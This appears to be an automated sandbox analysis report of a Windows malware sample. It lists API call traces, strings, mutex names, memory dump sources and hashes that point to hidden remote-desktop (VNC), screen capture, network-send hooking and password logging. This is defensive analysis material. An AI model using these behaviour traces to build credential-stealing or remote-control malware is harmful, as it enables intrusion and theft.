                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetWindow.USER32(00000000,00000003), ref: 02BBE2EE
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02BBA29F
                                                                                                                                                                                                            • GetAncestor.USER32(00000000,00000002,00000000), ref: 02BBA325
                                                                                                                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02BBA34C
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02BBA391
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02BBA3E5
                                                                                                                                                                                                              • Part of subcall function 02BBA100: GetTickCount.KERNEL32 ref: 02BBA18A
                                                                                                                                                                                                              • Part of subcall function 02BBA100: GetClassLongA.USER32(00000000,000000E6), ref: 02BBA1DD
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000112,?,?), ref: 02BBA44E
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02BBA479
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02BBA4F5
                                                                                                                                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 02BBA514
                                                                                                                                                                                                            • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02BBA538
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBA5A3
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02BBA5B6
                                                                                                                                                                                                            • PostMessageA.USER32(?,?,00000001,00000000), ref: 02BBA5D9
                                                                                                                                                                                                            • PostMessageA.USER32(?,?,00000002,00000000), ref: 02BBA5FB
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02BBA633
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBA65D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 590198697-0
                                                                                                                                                                                                            • Opcode ID: 20163c82ee87b3616ec0b07b6ff4c7b2443b711e2914e3ca6afad8d611f0f787
                                                                                                                                                                                                            • Instruction ID: 6356255b7b55eacdcf68ebfb71cbb12f324b9cd700084acb856463e00a31301a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20163c82ee87b3616ec0b07b6ff4c7b2443b711e2914e3ca6afad8d611f0f787
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2B17932F4021426EB329A18D889FFE7758DF81755F0840AAFE48E7182C7E9C861C7A1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02BBA70E
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02BB9523,00008001,?), ref: 02BBA737
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBA73E
                                                                                                                                                                                                            • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBA752
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02BBA7C1
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02BB9523,00008001,?), ref: 02BBA7DA
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBA86B
                                                                                                                                                                                                            • GetParent.USER32(00000000), ref: 02BBA882
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02BBA8C9
                                                                                                                                                                                                            • GetWindowInfo.USER32 ref: 02BBA941
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: GetWindowRect.USER32(?,?), ref: 02BB9FF7
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: IsRectEmpty.USER32(?), ref: 02BBA066
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: GetWindowLongA.USER32(?,000000F0), ref: 02BBA076
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: GetParent.USER32(?), ref: 02BBA08A
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: MapWindowPoints.USER32(00000000,00000000,?,02BBA6F4), ref: 02BBA093
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: SetWindowPos.USER32(?,00000000,?,02BBA6F4,00000000,00008001,0000630C,?,02BBA6F4,00000000,00008001,?), ref: 02BBA0B5
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBA8F0
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,0000020A,00000000,00000080), ref: 02BBAADF
                                                                                                                                                                                                              • Part of subcall function 02BB9F50: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,02BBA63F,00000000), ref: 02BB9F5C
                                                                                                                                                                                                              • Part of subcall function 02BB9F50: ReleaseMutex.KERNEL32(00000000,?,02BBA63F,00000000), ref: 02BB9F8D
                                                                                                                                                                                                              • Part of subcall function 02BB9F50: IsWindow.USER32(?), ref: 02BB9F94
                                                                                                                                                                                                              • Part of subcall function 02BB9F50: PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02BB9FAD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$MessageMutexObjectPostReleaseSingleWait$LongParentRect$EmptyInfoPointsProcessThread
                                                                                                                                                                                                            • String ID: <$@
                                                                                                                                                                                                            • API String ID: 2167780881-1426351568
                                                                                                                                                                                                            • Opcode ID: 827f360a9596392434a4c80c892f2826e7752a235798917f59ee636202af0946
                                                                                                                                                                                                            • Instruction ID: 264b16b27c3b0f672a4dd418a17ff4234c9a7a9cd3552944bd9718c80912ee07
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 827f360a9596392434a4c80c892f2826e7752a235798917f59ee636202af0946
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4C1F430A483416BD7268F19C888BFA7BE4EF85754F08899CFA965B2D1D7F0D444CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,76A8DB30), ref: 00401EC6
                                                                                                                                                                                                            • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,76A8DB30), ref: 00401EE2
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                            • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                            • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                            • String ID: %s1$%s12$%s123
                                                                                                                                                                                                            • API String ID: 1588441251-2882894844
                                                                                                                                                                                                            • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                            • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCE1D1
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02BCE209
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260), ref: 02BCE23D
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260), ref: 02BCE273
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(00000000), ref: 02BCE2B9
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCB980,00000000,00000000,00000000), ref: 02BCE338
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCE350
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCE361
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BCE387
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BCE3C4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashHandle$CloseCreateExistsFileInformationThreadmemcpymemsetstrstr
                                                                                                                                                                                                            • String ID: <L>$POST$bsi.dll$pass.log
                                                                                                                                                                                                            • API String ID: 4177962767-2639756587
                                                                                                                                                                                                            • Opcode ID: 59c49b8c7818c5c1bd8e38888d045edbfff2e8b4bdf8f57d6949d855f1eb6b47
                                                                                                                                                                                                            • Instruction ID: 46df604d2f633d9e092139db962f8a8c0f9caf5889cf91ce54daf9e584c0ba98
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59c49b8c7818c5c1bd8e38888d045edbfff2e8b4bdf8f57d6949d855f1eb6b47
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45512E31D40309DBD7229F34E848BDA7BA5FF88704F2586D9EA4597280DBB0EA54CBD0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?,76F8F590,76F816B0,?), ref: 02BB902F
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 02BB9037
                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02BB9048
                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 02BB9059
                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02BB9070
                                                                                                                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02BB90B2
                                                                                                                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02BB90C2
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02BB90C5
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 02BB90CE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB9129
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02BB9142
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02BB915F
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?), ref: 02BB9194
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                            • API String ID: 188880187-3887548279
                                                                                                                                                                                                            • Opcode ID: 82e4b6dae060cf417f81fcc2b31a3116b882f478e14696a1fb1a2337f630cee5
                                                                                                                                                                                                            • Instruction ID: 354fc3fd9d13f3d189becb481a452ea0169f03e41d30372ffc7b453bb87baad3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82e4b6dae060cf417f81fcc2b31a3116b882f478e14696a1fb1a2337f630cee5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D414F71E41314AFDB60CFA8D889FEA7BB8EB49750F544569E608EB381D7705810CFA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD31EC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD31FD
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD3211
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD321F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD3080,00000000,00000000,00000000), ref: 02BD3234
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02BD3245
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD324A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD325E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD326C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD3277
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0CE90,RFK), ref: 02BD3291
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD329A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • RFK, xrefs: 02BD327D
                                                                                                                                                                                                            • Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02BD31E0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                            • API String ID: 505831200-3131017963
                                                                                                                                                                                                            • Opcode ID: e47741c809ca2dc70248b2c73a57f488b0dfef15b4816ec6257fcc53d65c51c7
                                                                                                                                                                                                            • Instruction ID: ff859a45a5d056cd9978ac2d0f3cee82835e8d13f95d120a51b98ccdcdc10604
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e47741c809ca2dc70248b2c73a57f488b0dfef15b4816ec6257fcc53d65c51c7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E111E230AC57027BF26067649C0AF9F77D8AF04B94F508684FB95B61C1ABE0A5008FB7
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,76F8F550,76F8DF10,02BC598B), ref: 02BC9831
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02BC9843
                                                                                                                                                                                                              • Part of subcall function 02BCA540: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,76F8F550,00000000,753CBD50,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA578
                                                                                                                                                                                                              • Part of subcall function 02BCA540: memcpy.MSVCRT ref: 02BCA5A0
                                                                                                                                                                                                              • Part of subcall function 02BCA540: VirtualProtect.KERNEL32(00000000,?,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA635
                                                                                                                                                                                                              • Part of subcall function 02BCA540: VirtualProtect.KERNEL32(?,00000000,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA64A
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02BC9862
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,send), ref: 02BC9870
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WSASend), ref: 02BC988C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02BC98A8
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,recv), ref: 02BC98C4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                            • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                            • API String ID: 1216545827-2206184491
                                                                                                                                                                                                            • Opcode ID: fb0b1d228f9a03b660fd1cb2c8387043e08823716844a4df9e2989cf28e8c9c0
                                                                                                                                                                                                            • Instruction ID: 706086d7263a89eedce37d64d4fa08687f9015a9991ce9633dbe8181c86b88b7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb0b1d228f9a03b660fd1cb2c8387043e08823716844a4df9e2989cf28e8c9c0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1012972BC5F1A71FA6036760D02F2B134C5B84F88F3505E87603B6095EA98E50945B8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: malloc$inet_ntoa$closesocketfreegetpeernamesetsockopt
                                                                                                                                                                                                            • String ID: RFB 003.006
                                                                                                                                                                                                            • API String ID: 725816019-3790533501
                                                                                                                                                                                                            • Opcode ID: 363736c2336352898dad00d5f5a9c83b59d97b65f820c5ee2d897fe6c4cbe7ae
                                                                                                                                                                                                            • Instruction ID: 33c5ccd3f80c4411ab2af1f22f274613ebb151a6400bccb3516cbeb060aa573d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 363736c2336352898dad00d5f5a9c83b59d97b65f820c5ee2d897fe6c4cbe7ae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06C149B0A046448FDB14CF29D484B96BBE5FF88310F1985BADD5A8F356E775A800CFA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • Part of subcall function 00401E00: AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • Part of subcall function 00401E00: CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 1027056982-820036962
                                                                                                                                                                                                            • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                            • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD31EC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD31FD
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD3211
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD321F
